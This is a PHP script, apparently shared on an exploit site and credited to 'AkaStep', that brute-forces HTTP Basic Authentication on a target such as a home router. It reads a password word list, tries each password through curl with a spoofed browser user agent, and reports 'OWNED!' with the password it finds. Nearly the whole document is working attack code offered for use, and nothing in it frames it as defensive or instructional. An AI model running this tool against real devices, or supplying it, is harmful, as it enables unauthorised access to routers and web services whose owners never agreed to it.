This is a php script for brute forcing basic authentication. Takes a word list as input.
2c34929a4ee75e635f22f8cd534b8efd1b01310758d6e71dc4bf7d43ccbfac8f
<?php
error_reporting(0);
ini_set('memory_limit', '6000M');
set_time_limit(0);
/*
HTTP BASIC AUTH BRUTEFORCER PUBLIC edition
Qirilmayan Modem Qalmayacaq xD
/AkaStep
Usage:
$ php -f modembrute.php
############################################################
**************** HTTP BASIC AUTH BRUTEFORCER **************
********************* Istifade qaydasi ********************
php -f script.php username luget.txt http://192.168.1.1/
********************* Coded By AkaStep ********************
***********************************************************
*/
$usage=' php -f script.php username luget.txt http://192.168.1.1/';
$banner=str_repeat('#',60) . PHP_EOL . ' **************** HTTP BASIC AUTH BRUTEFORCER **************' . PHP_EOL .
' ********************* Istifade qaydasi ********************'.
PHP_EOL .$usage . PHP_EOL .
' ********************* Coded By AkaStep ********************'. PHP_EOL .
' *********************************************************** ' .PHP_EOL ;
$uname=$argv[1];
$luget=$argv[2];
$ip=$argv[3];
if(count($argv)!=4){ die(PHP_EOL . $banner . PHP_EOL);}
echo $banner;
//print_r($argv);exit; 1
$passmassiv=file($luget) or die('LUGETI ACA BILMIREM!' .PHP_EOL);
foreach($passmassiv as $pass)
{
!isset($za) ? $za=NULL : '';$za++;
$pass=trim((string)$pass);
$ch = curl_init();
$curlConfig = array(
CURLOPT_URL => $ip,
CURLOPT_POST => false,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
curl_setopt($ch, CURLOPT_TIMEOUT, 12),
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Authorization: Basic ' . base64_encode($uname.':'.$pass))));
curl_setopt_array($ch, $curlConfig);
curl_exec($ch);
$stat_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);//200 SUCCESS VERIR.//
echo 'HTTP STATUS CODE: ' . $stat_code . ' ';
curl_close($ch);
if($stat_code!==401) // success 200
{
echo '[' . $za .']' . ' ' . 'OWNED! ' . htmlspecialchars((string)$uname) . ' PASSWD: ' . htmlspecialchars((string)$pass). PHP_EOL;
exit;
}
else
{
echo '[' .$za .']' . ' ' . 'YOXLANILIR => ' . htmlspecialchars((string)$uname) . ' PAROL QISMINDE ISE: ' . htmlspecialchars((string)$pass). PHP_EOL;
}
}
unset($pass);
?>